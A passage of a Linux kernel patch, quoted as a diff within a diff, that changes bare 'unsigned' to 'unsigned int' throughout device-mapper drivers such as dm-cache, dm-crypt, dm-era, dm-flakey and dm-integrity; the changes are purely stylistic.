+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p)
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p)
+ {
+ 	struct dm_cache_policy_type *t = p->private;
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 06eb31af626f1..6ba3e9c91af53 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -128,7 +128,7 @@ struct dm_cache_policy {
+ 	 * Configuration.
+ 	 */
+ 	int (*emit_config_values)(struct dm_cache_policy *p, char *result,
+-				  unsigned maxlen, ssize_t *sz_ptr);
++				  unsigned int maxlen, ssize_t *sz_ptr);
+ 	int (*set_config_value)(struct dm_cache_policy *p,
+ 				const char *key, const char *value);
+ 
+@@ -157,7 +157,7 @@ struct dm_cache_policy_type {
+ 	 * what gets passed on the target line to select your policy.
+ 	 */
+ 	char name[CACHE_POLICY_NAME_SIZE];
+-	unsigned version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int version[CACHE_POLICY_VERSION_SIZE];
+ 
+ 	/*
+ 	 * For use by an alias dm_cache_policy_type to point to the
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 17fde3e5a1f7b..8f7426b71e025 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -275,7 +275,7 @@ enum cache_io_mode {
+ struct cache_features {
+ 	enum cache_metadata_mode mode;
+ 	enum cache_io_mode io_mode;
+-	unsigned metadata_version;
++	unsigned int metadata_version;
+ 	bool discard_passdown:1;
+ };
+ 
+@@ -362,7 +362,7 @@ struct cache {
+ 	 * Rather than reconstructing the table line for the status we just
+ 	 * save it and regurgitate.
+ 	 */
+-	unsigned nr_ctr_args;
++	unsigned int nr_ctr_args;
+ 	const char **ctr_args;
+ 
+ 	struct dm_kcopyd_client *copier;
+@@ -378,7 +378,7 @@ struct cache {
+ 	unsigned long *dirty_bitset;
+ 	atomic_t nr_dirty;
+ 
+-	unsigned policy_nr_args;
++	unsigned int policy_nr_args;
+ 	struct dm_cache_policy *policy;
+ 
+ 	/*
+@@ -409,7 +409,7 @@ struct cache {
+ 
+ struct per_bio_data {
+ 	bool tick:1;
+-	unsigned req_nr:2;
++	unsigned int req_nr:2;
+ 	struct dm_bio_prison_cell_v2 *cell;
+ 	struct dm_hook_info hook_info;
+ 	sector_t len;
+@@ -517,7 +517,7 @@ static void build_key(dm_oblock_t begin, dm_oblock_t end, struct dm_cell_key_v2
+ #define WRITE_LOCK_LEVEL 0
+ #define READ_WRITE_LOCK_LEVEL 1
+ 
+-static unsigned lock_level(struct bio *bio)
++static unsigned int lock_level(struct bio *bio)
+ {
+ 	return bio_data_dir(bio) == WRITE ?
+ 		WRITE_LOCK_LEVEL :
+@@ -1884,7 +1884,7 @@ static void check_migrations(struct work_struct *ws)
+  */
+ static void destroy(struct cache *cache)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mempool_exit(&cache->migration_pool);
+ 
+@@ -2124,7 +2124,7 @@ static int parse_features(struct cache_args *ca, struct dm_arg_set *as,
+ 	};
+ 
+ 	int r, mode_ctr = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg;
+ 	struct cache_features *cf = &ca->features;
+ 
+@@ -2544,7 +2544,7 @@ bad:
+ 
+ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	const char **copy;
+ 
+ 	copy = kcalloc(argc, sizeof(*copy), GFP_KERNEL);
+@@ -2566,7 +2566,7 @@ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ 	return 0;
+ }
+ 
+-static int cache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int cache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r = -EINVAL;
+ 	struct cache_args *ca;
+@@ -2669,7 +2669,7 @@ static int write_dirty_bitset(struct cache *cache)
+ 
+ static int write_discard_bitset(struct cache *cache)
+ {
+-	unsigned i, r;
++	unsigned int i, r;
+ 
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return -EINVAL;
+@@ -2983,11 +2983,11 @@ static void cache_resume(struct dm_target *ti)
+ }
+ 
+ static void emit_flags(struct cache *cache, char *result,
+-		       unsigned maxlen, ssize_t *sz_ptr)
++		       unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	struct cache_features *cf = &cache->features;
+-	unsigned count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
++	unsigned int count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
+ 
+ 	DMEMIT("%u ", count);
+ 
+@@ -3027,10 +3027,10 @@ static void emit_flags(struct cache *cache, char *result,
+  * <policy name> <#policy args> <policy args>* <cache metadata mode> <needs_check>
+  */
+ static void cache_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	ssize_t sz = 0;
+ 	dm_block_t nr_free_blocks_metadata = 0;
+ 	dm_block_t nr_blocks_metadata = 0;
+@@ -3067,18 +3067,18 @@ static void cache_status(struct dm_target *ti, status_type_t type,
+ 		residency = policy_residency(cache->policy);
+ 
+ 		DMEMIT("%u %llu/%llu %llu %llu/%llu %u %u %u %u %u %u %lu ",
+-		       (unsigned)DM_CACHE_METADATA_BLOCK_SIZE,
++		       (unsigned int)DM_CACHE_METADATA_BLOCK_SIZE,
+ 		       (unsigned long long)(nr_blocks_metadata - nr_free_blocks_metadata),
+ 		       (unsigned long long)nr_blocks_metadata,
+ 		       (unsigned long long)cache->sectors_per_block,
+ 		       (unsigned long long) from_cblock(residency),
+ 		       (unsigned long long) from_cblock(cache->cache_size),
+-		       (unsigned) atomic_read(&cache->stats.read_hit),
+-		       (unsigned) atomic_read(&cache->stats.read_miss),
+-		       (unsigned) atomic_read(&cache->stats.write_hit),
+-		       (unsigned) atomic_read(&cache->stats.write_miss),
+-		       (unsigned) atomic_read(&cache->stats.demotion),
+-		       (unsigned) atomic_read(&cache->stats.promotion),
++		       (unsigned int) atomic_read(&cache->stats.read_hit),
++		       (unsigned int) atomic_read(&cache->stats.read_miss),
++		       (unsigned int) atomic_read(&cache->stats.write_hit),
++		       (unsigned int) atomic_read(&cache->stats.write_miss),
++		       (unsigned int) atomic_read(&cache->stats.demotion),
++		       (unsigned int) atomic_read(&cache->stats.promotion),
+ 		       (unsigned long) atomic_read(&cache->nr_dirty));
+ 
+ 		emit_flags(cache, result, maxlen, &sz);
+@@ -3257,11 +3257,11 @@ static int request_invalidation(struct cache *cache, struct cblock_range *range)
+ 	return r;
+ }
+ 
+-static int process_invalidate_cblocks_message(struct cache *cache, unsigned count,
++static int process_invalidate_cblocks_message(struct cache *cache, unsigned int count,
+ 					      const char **cblock_ranges)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct cblock_range range;
+ 
+ 	if (!passthrough_mode(cache)) {
+@@ -3298,8 +3298,8 @@ static int process_invalidate_cblocks_message(struct cache *cache, unsigned coun
+  *
+  * The key migration_threshold is supported by the cache target core.
+  */
+-static int cache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int cache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct cache *cache = ti->private;
+ 
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 6c6bd24774f25..28c641352de9b 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -119,7 +119,7 @@ struct mapped_device {
+ 	struct dm_stats stats;
+ 
+ 	/* the number of internal suspends */
+-	unsigned internal_suspend_count;
++	unsigned int internal_suspend_count;
+ 
+ 	int swap_bios;
+ 	struct semaphore swap_bios_semaphore;
+@@ -326,9 +326,9 @@ static inline struct completion *dm_get_completion_from_kobject(struct kobject *
+ 	return &container_of(kobj, struct dm_kobject_holder, kobj)->completion;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param, unsigned def, unsigned max);
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max);
+ 
+-static inline bool dm_message_test_buffer_overflow(char *result, unsigned maxlen)
++static inline bool dm_message_test_buffer_overflow(char *result, unsigned int maxlen)
+ {
+ 	return !maxlen || strlen(result) + 1 >= maxlen;
+ }
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index dc2d0d61ade93..ee269b1d09fac 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -173,14 +173,14 @@ struct crypt_config {
+ 	} iv_gen_private;
+ 	u64 iv_offset;
+ 	unsigned int iv_size;
+-	unsigned short int sector_size;
++	unsigned short sector_size;
+ 	unsigned char sector_shift;
+ 
+ 	union {
+ 		struct crypto_skcipher **tfms;
+ 		struct crypto_aead **tfms_aead;
+ 	} cipher_tfm;
+-	unsigned tfms_count;
++	unsigned int tfms_count;
+ 	unsigned long cipher_flags;
+ 
+ 	/*
+@@ -214,7 +214,7 @@ struct crypt_config {
+ 	 * pool for per bio private data, crypto requests,
+ 	 * encryption requeusts/buffer pages and integrity tags
+ 	 */
+-	unsigned tag_pool_max_sectors;
++	unsigned int tag_pool_max_sectors;
+ 	mempool_t tag_pool;
+ 	mempool_t req_pool;
+ 	mempool_t page_pool;
+@@ -231,7 +231,7 @@ struct crypt_config {
+ #define POOL_ENTRY_SIZE	512
+ 
+ static DEFINE_SPINLOCK(dm_crypt_clients_lock);
+-static unsigned dm_crypt_clients_n = 0;
++static unsigned int dm_crypt_clients_n = 0;
+ static volatile unsigned long dm_crypt_pages_per_client;
+ #define DM_CRYPT_MEMORY_PERCENT			2
+ #define DM_CRYPT_MIN_PAGES_PER_CLIENT		(BIO_MAX_VECS * 16)
+@@ -356,7 +356,7 @@ static int crypt_iv_essiv_gen(struct crypt_config *cc, u8 *iv,
+ static int crypt_iv_benbi_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 			      const char *opts)
+ {
+-	unsigned bs;
++	unsigned int bs;
+ 	int log;
+ 
+ 	if (crypt_integrity_aead(cc))
+@@ -1466,7 +1466,7 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ static int crypt_alloc_req_skcipher(struct crypt_config *cc,
+ 				     struct convert_context *ctx)
+ {
+-	unsigned key_index = ctx->cc_sector & (cc->tfms_count - 1);
++	unsigned int key_index = ctx->cc_sector & (cc->tfms_count - 1);
+ 
+ 	if (!ctx->r.req) {
+ 		ctx->r.req = mempool_alloc(&cc->req_pool, in_interrupt() ? GFP_ATOMIC : GFP_NOIO);
+@@ -1660,13 +1660,13 @@ static void crypt_free_buffer_pages(struct crypt_config *cc, struct bio *clone);
+  * non-blocking allocations without a mutex first but on failure we fallback
+  * to blocking allocations with a mutex.
+  */
+-static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned size)
++static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned int size)
+ {
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 	unsigned int nr_iovecs = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 	gfp_t gfp_mask = GFP_NOWAIT | __GFP_HIGHMEM;
+-	unsigned i, len, remaining_size;
++	unsigned int i, len, remaining_size;
+ 	struct page *page;
+ 
+ retry:
+@@ -1806,7 +1806,7 @@ static void crypt_endio(struct bio *clone)
+ {
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+-	unsigned rw = bio_data_dir(clone);
++	unsigned int rw = bio_data_dir(clone);
+ 	blk_status_t error;
+ 
+ 	/*
+@@ -2261,7 +2261,7 @@ static void crypt_free_tfms_aead(struct crypt_config *cc)
+ 
+ static void crypt_free_tfms_skcipher(struct crypt_config *cc)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!cc->cipher_tfm.tfms)
+ 		return;
+@@ -2286,7 +2286,7 @@ static void crypt_free_tfms(struct crypt_config *cc)
+ 
+ static int crypt_alloc_tfms_skcipher(struct crypt_config *cc, char *ciphermode)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	int err;
+ 
+ 	cc->cipher_tfm.tfms = kcalloc(cc->tfms_count,
+@@ -2344,12 +2344,12 @@ static int crypt_alloc_tfms(struct crypt_config *cc, char *ciphermode)
+ 		return crypt_alloc_tfms_skcipher(cc, ciphermode);
+ }
+ 
+-static unsigned crypt_subkey_size(struct crypt_config *cc)
++static unsigned int crypt_subkey_size(struct crypt_config *cc)
+ {
+ 	return (cc->key_size - cc->key_extra_size) >> ilog2(cc->tfms_count);
+ }
+ 
+-static unsigned crypt_authenckey_size(struct crypt_config *cc)
++static unsigned int crypt_authenckey_size(struct crypt_config *cc)
+ {
+ 	return crypt_subkey_size(cc) + RTA_SPACE(sizeof(struct crypto_authenc_key_param));
+ }
+@@ -2360,7 +2360,7 @@ static unsigned crypt_authenckey_size(struct crypt_config *cc)
+  * This funcion converts cc->key to this special format.
+  */
+ static void crypt_copy_authenckey(char *p, const void *key,
+-				  unsigned enckeylen, unsigned authkeylen)
++				  unsigned int enckeylen, unsigned int authkeylen)
+ {
+ 	struct crypto_authenc_key_param *param;
+ 	struct rtattr *rta;
+@@ -2378,7 +2378,7 @@ static void crypt_copy_authenckey(char *p, const void *key,
+ 
+ static int crypt_setkey(struct crypt_config *cc)
+ {
+-	unsigned subkey_size;
++	unsigned int subkey_size;
+ 	int err = 0, i, r;
+ 
+ 	/* Ignore extra keys (which are used for IV etc) */
+@@ -3417,7 +3417,7 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 	crypt_io_init(io, cc, bio, dm_target_offset(ti, bio->bi_iter.bi_sector));
+ 
+ 	if (cc->on_disk_tag_size) {
+-		unsigned tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
++		unsigned int tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
+ 
+ 		if (unlikely(tag_len > KMALLOC_MAX_SIZE) ||
+ 		    unlikely(!(io->integrity_metadata = kmalloc(tag_len,
+@@ -3445,14 +3445,14 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 
+ static char hex2asc(unsigned char c)
+ {
+-	return c + '0' + ((unsigned)(9 - c) >> 4 & 0x27);
++	return c + '0' + ((unsigned int)(9 - c) >> 4 & 0x27);
+ }
+ 
+ static void crypt_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+-	unsigned i, sz = 0;
++	unsigned int i, sz = 0;
+ 	int num_feature_args = 0;
+ 
+ 	switch (type) {
+@@ -3568,8 +3568,8 @@ static void crypt_resume(struct dm_target *ti)
+  *	key set <key>
+  *	key wipe
+  */
+-static int crypt_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int crypt_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+ 	int key_size, ret = -EINVAL;
+@@ -3630,10 +3630,10 @@ static void crypt_io_hints(struct dm_target *ti, struct queue_limits *limits)
+ 	limits->max_segment_size = PAGE_SIZE;
+ 
+ 	limits->logical_block_size =
+-		max_t(unsigned, limits->logical_block_size, cc->sector_size);
++		max_t(unsigned int, limits->logical_block_size, cc->sector_size);
+ 	limits->physical_block_size =
+-		max_t(unsigned, limits->physical_block_size, cc->sector_size);
+-	limits->io_min = max_t(unsigned, limits->io_min, cc->sector_size);
++		max_t(unsigned int, limits->physical_block_size, cc->sector_size);
++	limits->io_min = max_t(unsigned int, limits->io_min, cc->sector_size);
+ 	limits->dma_alignment = limits->logical_block_size - 1;
+ }
+ 
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 869afef5654ae..02b8f4e818276 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -20,8 +20,8 @@
+ struct delay_class {
+ 	struct dm_dev *dev;
+ 	sector_t start;
+-	unsigned delay;
+-	unsigned ops;
++	unsigned int delay;
++	unsigned int ops;
+ };
+ 
+ struct delay_c {
+@@ -305,7 +305,7 @@ static int delay_map(struct dm_target *ti, struct bio *bio)
+ 	DMEMIT("%s %llu %u", (c)->dev->name, (unsigned long long)(c)->start, (c)->delay)
+ 
+ static void delay_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct delay_c *dc = ti->private;
+ 	int sz = 0;
+diff --git a/drivers/md/dm-ebs-target.c b/drivers/md/dm-ebs-target.c
+index 512cc6cea095a..7606c6695a0e2 100644
+--- a/drivers/md/dm-ebs-target.c
++++ b/drivers/md/dm-ebs-target.c
+@@ -390,7 +390,7 @@ static int ebs_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void ebs_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct ebs_c *ec = ti->private;
+ 
+diff --git a/drivers/md/dm-era-target.c b/drivers/md/dm-era-target.c
+index e92c1afc3677f..a96290103cca8 100644
+--- a/drivers/md/dm-era-target.c
++++ b/drivers/md/dm-era-target.c
+@@ -51,7 +51,7 @@ static void writeset_free(struct writeset *ws)
+ }
+ 
+ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+-				unsigned nr_bits, dm_block_t *root)
++				unsigned int nr_bits, dm_block_t *root)
+ {
+ 	int r;
+ 
+@@ -62,7 +62,7 @@ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+ 	return dm_bitset_resize(info, *root, 0, nr_bits, false, root);
+ }
+ 
+-static size_t bitset_size(unsigned nr_bits)
++static size_t bitset_size(unsigned int nr_bits)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_bits, BITS_PER_LONG);
+ }
+@@ -323,10 +323,10 @@ static int superblock_lock(struct era_metadata *md,
+ static int superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -363,12 +363,12 @@ static void ws_unpack(const struct writeset_disk *disk, struct writeset_metadata
+ 	core->root = le64_to_cpu(disk->root);
+ }
+ 
+-static void ws_inc(void *context, const void *value, unsigned count)
++static void ws_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -377,12 +377,12 @@ static void ws_inc(void *context, const void *value, unsigned count)
+ 	}
+ }
+ 
+-static void ws_dec(void *context, const void *value, unsigned count)
++static void ws_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -667,7 +667,7 @@ static void swap_writeset(struct era_metadata *md, struct writeset *new_writeset
+  *--------------------------------------------------------------*/
+ struct digest {
+ 	uint32_t era;
+-	unsigned nr_bits, current_bit;
++	unsigned int nr_bits, current_bit;
+ 	struct writeset_metadata writeset;
+ 	__le32 value;
+ 	struct dm_disk_bitset info;
+@@ -702,7 +702,7 @@ static int metadata_digest_transcribe_writeset(struct era_metadata *md,
+ {
+ 	int r;
+ 	bool marked;
+-	unsigned b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
++	unsigned int b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
+ 
+ 	for (b = d->current_bit; b < e; b++) {
+ 		r = writeset_marked_on_disk(&d->info, &d->writeset, b, &marked);
+@@ -1439,7 +1439,7 @@ static bool valid_block_size(dm_block_t block_size)
+ /*
+  * <metadata dev> <data dev> <data block size (sectors)>
+  */
+-static int era_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int era_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	char dummy;
+@@ -1618,7 +1618,7 @@ static int era_preresume(struct dm_target *ti)
+  * <current era> <held metadata root | '-'>
+  */
+ static void era_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	struct era *era = ti->private;
+@@ -1633,10 +1633,10 @@ static void era_status(struct dm_target *ti, status_type_t type,
+ 			goto err;
+ 
+ 		DMEMIT("%u %llu/%llu %u",
+-		       (unsigned) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
++		       (unsigned int) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
+ 		       (unsigned long long) stats.used,
+ 		       (unsigned long long) stats.total,
+-		       (unsigned) stats.era);
++		       (unsigned int) stats.era);
+ 
+ 		if (stats.snap != SUPERBLOCK_LOCATION)
+ 			DMEMIT(" %llu", stats.snap);
+@@ -1662,8 +1662,8 @@ err:
+ 	DMEMIT("Error");
+ }
+ 
+-static int era_message(struct dm_target *ti, unsigned argc, char **argv,
+-		       char *result, unsigned maxlen)
++static int era_message(struct dm_target *ti, unsigned int argc, char **argv,
++		       char *result, unsigned int maxlen)
+ {
+ 	struct era *era = ti->private;
+ 
+diff --git a/drivers/md/dm-exception-store.c b/drivers/md/dm-exception-store.c
+index 3997f34cfebc6..cc3987c97eb94 100644
+--- a/drivers/md/dm-exception-store.c
++++ b/drivers/md/dm-exception-store.c
+@@ -142,7 +142,7 @@ EXPORT_SYMBOL(dm_exception_store_type_unregister);
+ static int set_chunk_size(struct dm_exception_store *store,
+ 			  const char *chunk_size_arg, char **error)
+ {
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 
+ 	if (kstrtouint(chunk_size_arg, 10, &chunk_size)) {
+ 		*error = "Invalid chunk size";
+@@ -158,7 +158,7 @@ static int set_chunk_size(struct dm_exception_store *store,
+ }
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error)
+ {
+ 	/* Check chunk_size is a power of 2 */
+@@ -190,7 +190,7 @@ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store)
+ {
+ 	int r = 0;
+diff --git a/drivers/md/dm-exception-store.h b/drivers/md/dm-exception-store.h
+index b5f20eba36415..862df68a7db04 100644
+--- a/drivers/md/dm-exception-store.h
++++ b/drivers/md/dm-exception-store.h
+@@ -96,9 +96,9 @@ struct dm_exception_store_type {
+ 	 */
+ 	void (*drop_snapshot) (struct dm_exception_store *store);
+ 
+-	unsigned (*status) (struct dm_exception_store *store,
+-			    status_type_t status, char *result,
+-			    unsigned maxlen);
++	unsigned int (*status) (struct dm_exception_store *store,
++				status_type_t status, char *result,
++				unsigned int maxlen);
+ 
+ 	/*
+ 	 * Return how full the snapshot is.
+@@ -118,9 +118,9 @@ struct dm_exception_store {
+ 	struct dm_snapshot *snap;
+ 
+ 	/* Size of data blocks saved - must be a power of 2 */
+-	unsigned chunk_size;
+-	unsigned chunk_mask;
+-	unsigned chunk_shift;
++	unsigned int chunk_size;
++	unsigned int chunk_mask;
++	unsigned int chunk_shift;
+ 
+ 	void *context;
+ 
+@@ -144,7 +144,7 @@ static inline chunk_t dm_chunk_number(chunk_t chunk)
+ 	return chunk & (chunk_t)((1ULL << DM_CHUNK_NUMBER_BITS) - 1ULL);
+ }
+ 
+-static inline unsigned dm_consecutive_chunk_count(struct dm_exception *e)
++static inline unsigned int dm_consecutive_chunk_count(struct dm_exception *e)
+ {
+ 	return e->new_chunk >> DM_CHUNK_NUMBER_BITS;
+ }
+@@ -181,12 +181,12 @@ int dm_exception_store_type_register(struct dm_exception_store_type *type);
+ int dm_exception_store_type_unregister(struct dm_exception_store_type *type);
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error);
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store);
+ void dm_exception_store_destroy(struct dm_exception_store *store);
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 335684a1aeaa5..7efbdb42cf3b4 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -26,12 +26,12 @@ struct flakey_c {
+ 	struct dm_dev *dev;
+ 	unsigned long start_time;
+ 	sector_t start;
+-	unsigned up_interval;
+-	unsigned down_interval;
++	unsigned int up_interval;
++	unsigned int down_interval;
+ 	unsigned long flags;
+-	unsigned corrupt_bio_byte;
+-	unsigned corrupt_bio_rw;
+-	unsigned corrupt_bio_value;
++	unsigned int corrupt_bio_byte;
++	unsigned int corrupt_bio_rw;
++	unsigned int corrupt_bio_value;
+ 	blk_opf_t corrupt_bio_flags;
+ };
+ 
+@@ -48,7 +48,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			  struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -148,7 +148,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			BUILD_BUG_ON(sizeof(fc->corrupt_bio_flags) !=
+ 				     sizeof(unsigned int));
+ 			r = dm_read_arg(_args + 3, as,
+-				(__force unsigned *)&fc->corrupt_bio_flags,
++				(__force unsigned int *)&fc->corrupt_bio_flags,
+ 				&ti->error);
+ 			if (r)
+ 				return r;
+@@ -324,7 +324,7 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct flakey_c *fc = ti->private;
+-	unsigned elapsed;
++	unsigned int elapsed;
+ 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
+ 	pb->bio_submitted = false;
+ 
+@@ -417,11 +417,11 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ }
+ 
+ static void flakey_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct flakey_c *fc = ti->private;
+-	unsigned drop_writes, error_writes;
++	unsigned int drop_writes, error_writes;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 1388ee35571e0..53f9f765df9fd 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -157,13 +157,13 @@ struct alg_spec {
+ 	char *alg_string;
+ 	char *key_string;
+ 	__u8 *key;
+-	unsigned key_size;
++	unsigned int key_size;
+ };
+ 
+ struct dm_integrity_c {
+ 	struct dm_dev *dev;
+ 	struct dm_dev *meta_dev;
+-	unsigned tag_size;
++	unsigned int tag_size;
+ 	__s8 log2_tag_size;
+ 	sector_t start;
+ 	mempool_t journal_io_mempool;
+@@ -171,8 +171,8 @@ struct dm_integrity_c {
+ 	struct dm_bufio_client *bufio;
+ 	struct workqueue_struct *metadata_wq;
+ 	struct superblock *sb;
+-	unsigned journal_pages;
+-	unsigned n_bitmap_blocks;
++	unsigned int journal_pages;
++	unsigned int n_bitmap_blocks;
+ 
+ 	struct page_list *journal;
+ 	struct page_list *journal_io;
+@@ -180,7 +180,7 @@ struct dm_integrity_c {
+ 	struct page_list *recalc_bitmap;
+ 	struct page_list *may_write_bitmap;
+ 	struct bitmap_block_status *bbs;
+-	unsigned bitmap_flush_interval;
++	unsigned int bitmap_flush_interval;
+ 	int synchronous_mode;
+ 	struct bio_list synchronous_bios;
+ 	struct delayed_work bitmap_flush_work;
+@@ -201,12 +201,12 @@ struct dm_integrity_c {
+ 	unsigned char journal_entries_per_sector;
+ 	unsigned char journal_section_entries;
+ 	unsigned short journal_section_sectors;
+-	unsigned journal_sections;
+-	unsigned journal_entries;
++	unsigned int journal_sections;
++	unsigned int journal_entries;
+ 	sector_t data_device_sectors;
+ 	sector_t meta_device_sectors;
+-	unsigned initial_sectors;
+-	unsigned metadata_run;
++	unsigned int initial_sectors;
++	unsigned int metadata_run;
+ 	__s8 log2_metadata_run;
+ 	__u8 log2_buffer_sectors;
+ 	__u8 sectors_per_block;
+@@ -230,17 +230,17 @@ struct dm_integrity_c {
+ 	unsigned char commit_seq;
+ 	commit_id_t commit_ids[N_COMMIT_IDS];
+ 
